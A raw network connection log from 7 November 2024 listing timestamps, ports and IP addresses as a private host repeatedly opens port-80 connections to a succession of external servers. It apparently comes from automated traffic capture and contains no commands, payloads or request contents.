Nov 7, 2024 08:09:54.074839115 CET	49842	80	192.168.2.4	3.33.130.190
Nov 7, 2024 08:09:54.970973015 CET	49842	80	192.168.2.4	3.33.130.190
Nov 7, 2024 08:09:54.975914955 CET	80	49842	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:55.989968061 CET	49858	80	192.168.2.4	3.33.130.190
Nov 7, 2024 08:09:55.994766951 CET	80	49858	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:55.994885921 CET	49858	80	192.168.2.4	3.33.130.190
Nov 7, 2024 08:09:56.006114006 CET	49858	80	192.168.2.4	3.33.130.190
Nov 7, 2024 08:09:56.011007071 CET	80	49858	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:56.011017084 CET	80	49858	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:56.011049986 CET	80	49858	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:56.011059046 CET	80	49858	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:56.011109114 CET	80	49858	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:56.011117935 CET	80	49858	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:56.011158943 CET	80	49858	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:56.011168957 CET	80	49858	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:56.011204958 CET	80	49858	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:56.611546040 CET	80	49858	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:56.611639977 CET	49858	80	192.168.2.4	3.33.130.190
Nov 7, 2024 08:09:57.517759085 CET	49858	80	192.168.2.4	3.33.130.190
Nov 7, 2024 08:09:57.522589922 CET	80	49858	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:58.536786079 CET	49874	80	192.168.2.4	3.33.130.190
Nov 7, 2024 08:09:58.541721106 CET	80	49874	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:58.541841030 CET	49874	80	192.168.2.4	3.33.130.190
Nov 7, 2024 08:09:58.549581051 CET	49874	80	192.168.2.4	3.33.130.190
Nov 7, 2024 08:09:58.554498911 CET	80	49874	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:59.315627098 CET	80	49874	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:59.315658092 CET	80	49874	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:59.315757036 CET	80	49874	3.33.130.190	192.168.2.4
Nov 7, 2024 08:09:59.315783024 CET	49874	80	192.168.2.4	3.33.130.190
Nov 7, 2024 08:09:59.315808058 CET	49874	80	192.168.2.4	3.33.130.190
Nov 7, 2024 08:09:59.318559885 CET	49874	80	192.168.2.4	3.33.130.190
Nov 7, 2024 08:09:59.328996897 CET	80	49874	3.33.130.190	192.168.2.4
Nov 7, 2024 08:10:04.348453999 CET	49905	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:04.353244066 CET	80	49905	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:04.353326082 CET	49905	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:04.364084005 CET	49905	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:04.368837118 CET	80	49905	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:05.316379070 CET	80	49905	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:05.361530066 CET	49905	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:05.496273041 CET	80	49905	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:05.496368885 CET	49905	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:05.877315998 CET	49905	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:06.896065950 CET	49921	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:06.900897980 CET	80	49921	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:06.900989056 CET	49921	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:06.911824942 CET	49921	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:06.916609049 CET	80	49921	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:07.853404999 CET	80	49921	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:07.908319950 CET	49921	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:08.032768965 CET	80	49921	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:08.032870054 CET	49921	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:08.424061060 CET	49921	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:09.449856043 CET	49935	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:09.454708099 CET	80	49935	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:09.454787970 CET	49935	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:09.466171980 CET	49935	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:09.471045971 CET	80	49935	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:09.471064091 CET	80	49935	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:09.471084118 CET	80	49935	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:09.471092939 CET	80	49935	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:09.471108913 CET	80	49935	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:09.471118927 CET	80	49935	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:09.471131086 CET	80	49935	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:09.471255064 CET	80	49935	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:09.471275091 CET	80	49935	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:10.431720018 CET	80	49935	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:10.487730980 CET	49935	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:10.608803988 CET	80	49935	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:10.609004974 CET	49935	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:10.971019983 CET	49935	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:11.989995003 CET	49951	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:11.994932890 CET	80	49951	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:11.995027065 CET	49951	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:12.002129078 CET	49951	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:12.007013083 CET	80	49951	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:12.939398050 CET	80	49951	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:12.986505985 CET	49951	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:13.119003057 CET	80	49951	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:13.121248960 CET	49951	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:13.122184038 CET	49951	80	192.168.2.4	103.71.154.12
Nov 7, 2024 08:10:13.127023935 CET	80	49951	103.71.154.12	192.168.2.4
Nov 7, 2024 08:10:18.198267937 CET	49987	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:18.203217030 CET	80	49987	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:18.203329086 CET	49987	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:18.215296030 CET	49987	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:18.220124960 CET	80	49987	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:19.041865110 CET	80	49987	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:19.095830917 CET	49987	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:19.165899038 CET	80	49987	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:19.165986061 CET	49987	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:19.720881939 CET	49987	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:20.741436005 CET	50002	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:20.746400118 CET	80	50002	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:20.746494055 CET	50002	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:20.761446953 CET	50002	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:20.766304016 CET	80	50002	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:21.596363068 CET	80	50002	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:21.642700911 CET	50002	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:21.719552040 CET	80	50002	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:21.719625950 CET	50002	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:22.267776966 CET	50002	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:23.287578106 CET	50015	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:23.292452097 CET	80	50015	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:23.292534113 CET	50015	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:23.303647041 CET	50015	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:23.308518887 CET	80	50015	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:23.308532000 CET	80	50015	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:23.308552027 CET	80	50015	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:23.308559895 CET	80	50015	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:23.308604002 CET	80	50015	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:23.308613062 CET	80	50015	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:23.308629990 CET	80	50015	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:23.308690071 CET	80	50015	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:23.308701992 CET	80	50015	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:24.137839079 CET	80	50015	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:24.189589977 CET	50015	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:24.261076927 CET	80	50015	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:24.261136055 CET	50015	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:24.817462921 CET	50015	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:25.834461927 CET	50018	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:25.839690924 CET	80	50018	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:25.839760065 CET	50018	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:25.848643064 CET	50018	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:25.854690075 CET	80	50018	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:26.687990904 CET	80	50018	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:26.739896059 CET	50018	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:26.813230038 CET	80	50018	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:26.815643072 CET	50018	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:26.819576979 CET	50018	80	192.168.2.4	81.169.145.95
Nov 7, 2024 08:10:26.824435949 CET	80	50018	81.169.145.95	192.168.2.4
Nov 7, 2024 08:10:31.873056889 CET	50019	80	192.168.2.4	45.79.252.94
Nov 7, 2024 08:10:31.877914906 CET	80	50019	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:31.877981901 CET	50019	80	192.168.2.4	45.79.252.94
Nov 7, 2024 08:10:31.890765905 CET	50019	80	192.168.2.4	45.79.252.94
Nov 7, 2024 08:10:31.895704031 CET	80	50019	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:32.603751898 CET	80	50019	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:32.618959904 CET	80	50019	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:32.623460054 CET	50019	80	192.168.2.4	45.79.252.94
Nov 7, 2024 08:10:33.392802954 CET	50019	80	192.168.2.4	45.79.252.94
Nov 7, 2024 08:10:34.411451101 CET	50020	80	192.168.2.4	45.79.252.94
Nov 7, 2024 08:10:34.416486025 CET	80	50020	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:34.419450045 CET	50020	80	192.168.2.4	45.79.252.94
Nov 7, 2024 08:10:34.428287029 CET	50020	80	192.168.2.4	45.79.252.94
Nov 7, 2024 08:10:34.433299065 CET	80	50020	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:35.158065081 CET	80	50020	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:35.174844027 CET	80	50020	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:35.175724030 CET	50020	80	192.168.2.4	45.79.252.94
Nov 7, 2024 08:10:35.939713001 CET	50020	80	192.168.2.4	45.79.252.94
Nov 7, 2024 08:10:36.958705902 CET	50021	80	192.168.2.4	45.79.252.94
Nov 7, 2024 08:10:36.963681936 CET	80	50021	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:36.963804960 CET	50021	80	192.168.2.4	45.79.252.94
Nov 7, 2024 08:10:36.977092028 CET	50021	80	192.168.2.4	45.79.252.94
Nov 7, 2024 08:10:36.982300043 CET	80	50021	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:36.982348919 CET	80	50021	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:36.982481956 CET	80	50021	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:36.982492924 CET	80	50021	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:36.982501984 CET	80	50021	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:36.982511997 CET	80	50021	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:36.982532024 CET	80	50021	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:36.982541084 CET	80	50021	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:36.982549906 CET	80	50021	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:37.740475893 CET	80	50021	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:37.757889986 CET	80	50021	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:37.757946014 CET	50021	80	192.168.2.4	45.79.252.94
Nov 7, 2024 08:10:38.486521006 CET	50021	80	192.168.2.4	45.79.252.94
Nov 7, 2024 08:10:39.508397102 CET	50022	80	192.168.2.4	45.79.252.94
Nov 7, 2024 08:10:39.513463974 CET	80	50022	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:39.513539076 CET	50022	80	192.168.2.4	45.79.252.94
Nov 7, 2024 08:10:39.526510954 CET	50022	80	192.168.2.4	45.79.252.94
Nov 7, 2024 08:10:39.532269001 CET	80	50022	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:40.248883963 CET	80	50022	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:40.265918016 CET	80	50022	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:40.266017914 CET	50022	80	192.168.2.4	45.79.252.94
Nov 7, 2024 08:10:40.267036915 CET	50022	80	192.168.2.4	45.79.252.94
Nov 7, 2024 08:10:40.271886110 CET	80	50022	45.79.252.94	192.168.2.4
Nov 7, 2024 08:10:45.485594988 CET	50023	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:45.490652084 CET	80	50023	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:45.490727901 CET	50023	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:45.503308058 CET	50023	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:45.508517981 CET	80	50023	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:46.108361006 CET	80	50023	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:46.108433962 CET	80	50023	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:46.108488083 CET	50023	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:46.108936071 CET	80	50023	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:46.108988047 CET	50023	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:47.017791033 CET	50023	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:48.037326097 CET	50024	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:48.042361975 CET	80	50024	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:48.042476892 CET	50024	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:48.053422928 CET	50024	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:48.058279991 CET	80	50024	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:48.687716007 CET	80	50024	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:48.687879086 CET	80	50024	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:48.688009024 CET	50024	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:48.688108921 CET	80	50024	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:48.691687107 CET	50024	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:49.565068960 CET	50024	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:50.583681107 CET	50025	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:50.588517904 CET	80	50025	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:50.588736057 CET	50025	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:50.599750042 CET	50025	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:50.604681015 CET	80	50025	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:50.604696035 CET	80	50025	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:50.604715109 CET	80	50025	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:50.604743004 CET	80	50025	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:50.604757071 CET	80	50025	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:50.604784012 CET	80	50025	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:50.604799986 CET	80	50025	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:50.604823112 CET	80	50025	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:50.604832888 CET	80	50025	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:51.213530064 CET	80	50025	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:51.213546038 CET	80	50025	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:51.213676929 CET	50025	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:51.214082956 CET	80	50025	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:51.214207888 CET	50025	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:52.111632109 CET	50025	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:53.130274057 CET	50026	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:53.136631012 CET	80	50026	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:53.139683008 CET	50026	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:53.146644115 CET	50026	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:53.152127028 CET	80	50026	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:53.802922010 CET	80	50026	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:53.802994013 CET	80	50026	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:53.803091049 CET	50026	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:53.834849119 CET	80	50026	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:53.834994078 CET	50026	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:53.836901903 CET	50026	80	192.168.2.4	199.59.243.227
Nov 7, 2024 08:10:53.841728926 CET	80	50026	199.59.243.227	192.168.2.4
Nov 7, 2024 08:10:59.430327892 CET	50027	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:10:59.435400009 CET	80	50027	163.44.176.12	192.168.2.4
Nov 7, 2024 08:10:59.435475111 CET	50027	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:10:59.447422028 CET	50027	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:10:59.452291012 CET	80	50027	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:00.320949078 CET	80	50027	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:00.320987940 CET	80	50027	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:00.321042061 CET	50027	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:11:00.463799953 CET	80	50027	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:00.463877916 CET	50027	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:11:00.955635071 CET	50027	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:11:01.975188971 CET	50028	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:11:01.980763912 CET	80	50028	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:01.980835915 CET	50028	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:11:01.993752956 CET	50028	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:11:01.998609066 CET	80	50028	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:02.894866943 CET	80	50028	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:02.894884109 CET	80	50028	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:02.894973040 CET	50028	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:11:03.040115118 CET	80	50028	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:03.040642023 CET	50028	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:11:03.522813082 CET	50028	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:11:04.542748928 CET	50029	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:11:04.547810078 CET	80	50029	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:04.547924042 CET	50029	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:11:04.557389021 CET	50029	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:11:04.562314034 CET	80	50029	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:04.562333107 CET	80	50029	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:04.562345028 CET	80	50029	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:04.562392950 CET	80	50029	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:04.562402964 CET	80	50029	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:04.562511921 CET	80	50029	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:04.562525988 CET	80	50029	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:04.562546968 CET	80	50029	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:04.562556982 CET	80	50029	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:05.422693968 CET	80	50029	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:05.422712088 CET	80	50029	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:05.422905922 CET	50029	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:11:05.568855047 CET	80	50029	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:05.568909883 CET	50029	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:11:06.064651966 CET	50029	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:11:07.083183050 CET	50030	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:11:07.088399887 CET	80	50030	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:07.088480949 CET	50030	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:11:07.095388889 CET	50030	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:11:07.100238085 CET	80	50030	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:07.962584019 CET	80	50030	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:07.962601900 CET	80	50030	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:07.962723970 CET	50030	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:11:08.103553057 CET	80	50030	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:08.103660107 CET	50030	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:11:08.104701042 CET	50030	80	192.168.2.4	163.44.176.12
Nov 7, 2024 08:11:08.109489918 CET	80	50030	163.44.176.12	192.168.2.4
Nov 7, 2024 08:11:13.203743935 CET	50031	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:13.208559036 CET	80	50031	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:13.208655119 CET	50031	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:13.221466064 CET	50031	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:13.226291895 CET	80	50031	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:14.054522991 CET	80	50031	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:14.095881939 CET	50031	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:14.179241896 CET	80	50031	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:14.179294109 CET	50031	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:14.721062899 CET	50031	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:15.740681887 CET	50032	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:15.745632887 CET	80	50032	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:15.745706081 CET	50032	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:15.759059906 CET	50032	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:15.763942957 CET	80	50032	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:16.587081909 CET	80	50032	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:16.645452023 CET	50032	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:16.711688995 CET	80	50032	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:16.713525057 CET	50032	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:17.269448042 CET	50032	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:18.287885904 CET	50033	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:18.292819977 CET	80	50033	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:18.292886972 CET	50033	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:18.311646938 CET	50033	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:18.316663027 CET	80	50033	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:18.316679955 CET	80	50033	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:18.316696882 CET	80	50033	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:18.316705942 CET	80	50033	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:18.316745043 CET	80	50033	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:18.316754103 CET	80	50033	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:18.316898108 CET	80	50033	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:18.316907883 CET	80	50033	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:18.316926003 CET	80	50033	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:19.140605927 CET	80	50033	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:19.191688061 CET	50033	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:19.266380072 CET	80	50033	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:19.266498089 CET	50033	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:19.814670086 CET	50033	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:20.837059021 CET	50034	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:20.844584942 CET	80	50034	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:20.844692945 CET	50034	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:20.853399038 CET	50034	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:20.858205080 CET	80	50034	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:21.693216085 CET	80	50034	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:21.736506939 CET	50034	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:21.818826914 CET	80	50034	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:21.818944931 CET	50034	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:21.819952011 CET	50034	80	192.168.2.4	195.110.124.133
Nov 7, 2024 08:11:21.824708939 CET	80	50034	195.110.124.133	192.168.2.4
Nov 7, 2024 08:11:26.861460924 CET	50035	80	192.168.2.4	67.223.117.142
Nov 7, 2024 08:11:26.866478920 CET	80	50035	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:26.866619110 CET	50035	80	192.168.2.4	67.223.117.142
Nov 7, 2024 08:11:26.876295090 CET	50035	80	192.168.2.4	67.223.117.142
Nov 7, 2024 08:11:26.881253958 CET	80	50035	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:27.563663006 CET	80	50035	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:27.602330923 CET	80	50035	67.223.117.142	192.168.2.4
Nov 7, 2024 08:11:27.602385998 CET	50035	80	192.168.2.4	67.223.117.142
Nov 7, 2024 08:11:28.392788887 CET	50035	80	192.168.2.4	67.223.117.142
Nov 7, 2024 08:11:29.411803961 CET	50036	80	192.168.2.4	67.223.117.142
